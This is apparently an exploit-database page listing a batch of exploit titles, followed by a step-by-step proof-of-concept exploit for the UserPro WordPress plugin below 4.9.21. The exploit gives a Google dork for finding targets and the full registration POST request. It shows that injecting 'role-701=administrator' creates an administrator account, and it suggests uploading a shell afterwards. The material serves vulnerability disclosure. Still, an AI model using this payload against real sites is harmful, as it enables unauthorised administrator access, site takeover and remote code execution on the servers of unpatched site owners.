deaee53895
19 changes to exploits/shellcodes Microsoft Edge 44.17763.1.0 - NULL Pointer Dereference BlueAuditor 1.7.2.0 - 'Key' Denial of Service (PoC) SpotFTP Password Recover 2.4.2 - 'Name' Denial of Service (PoC) Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC) KioWare Server Version 4.9.6 - Weak Folder Permissions Privilege Escalation Mailcleaner - Authenticated Remote Code Execution (Metasploit) Embed Video Scripts - Persistent Cross-Site Scripting All in One Video Downloader 1.2 - Authenticated SQL Injection LayerBB 1.1.1 - Persistent Cross-Site Scripting MyBB OUGC Awards Plugin 1.8.3 - Persistent Cross-Site Scripting PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Scripting phpMoAdmin MongoDB GUI 1.1.5 - Cross-Site Request Forgery / Cross-Site Scripting Wordpress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation MyT Project Management 1.5.1 - 'Charge[group_total]' SQL Injection Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal Ajera Timesheets 9.10.16 - Deserialization of Untrusted Data Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection Huawei E5330 21.210.09.00.158 - Cross-Site Request Forgery (Send SMS)
54 lines
No EOL
2.1 KiB
Text
54 lines
No EOL
2.1 KiB
Text
# Exploit Title: Wordpress Plugin UserPro < 4.9.21 User Registration With Administrator Role
|
|
# Google Dork: inurl:/wp-content/plugins/userpro/
|
|
# Date: 3rd January, 2019
|
|
# Exploit Author: Noman Riffat
|
|
# Vendor Homepage: https://userproplugin.com/
|
|
# Software Link: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681
|
|
# Version: < 4.9.21
|
|
# Tested on: Wordpress 4.9.9 with linux but should work on all WP versions and OS as well
|
|
|
|
UserPro fixed a user registration with administrator privileges vulnerability in version 4.9.21
|
|
But there wasn't any POC available so this exploit demonstrates this
|
|
vulnerability.
|
|
https://demo.userproplugin.com/wp-content/plugins/userpro/changelog.txt
|
|
From the changelog: "Security Fix : Registration role validation fix"
|
|
|
|
The latest version up to now is 4.9.29
|
|
The vulnerability allows anyone to register with Administrator role which
|
|
can easily be turned into RCE
|
|
|
|
Steps to reproduce:
|
|
|
|
1. Go to the registration form, input random fake values, trigger Burp
|
|
Suite and click submit.
|
|
|
|
2. The POST data will look similar to following
|
|
|
|
redirect_uri-701=&_myuserpro_nonce=xxxxxx&_wp_http_referer=%2F&unique_id=701&user_login-701=USERNAME&user_email-701=
|
|
USERNAME@EMAIL.COM
|
|
&user_pass-701=PASSWORD&user_pass_confirm-701=PASSWORD&display_name-701=&profilepicture-701=&country-701=&facebook-701=&twitter-701=&google_plus-701=&user_url-701=&terms=on&action=userpro_process_form&template=register&group=default&shortcode=xxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
|
|
Here "-701" is a random postfix number and gets stripped at the server.
|
|
Other than that, the interesting values are
|
|
|
|
user_login
|
|
user_email
|
|
user_pass
|
|
user_pass_confirm
|
|
|
|
3. Adding following extra parameter in POST data will register the user
|
|
with Administrator privileges
|
|
|
|
role-701=administrator
|
|
|
|
So the modified POST data will look similar to following
|
|
|
|
role-701=administrator&redirect_uri-701=&_myuserpro_nonce=xxxxxx&....snip....snip....
|
|
|
|
4. Forward the POST data in Burp Suite and you will get redirect to
|
|
/profile/ page with Administrator menu on top. Access /wp-admin/ to get to
|
|
the dashboard
|
|
|
|
5. Upload shell with default methods
|
|
|
|
@nomanriffat |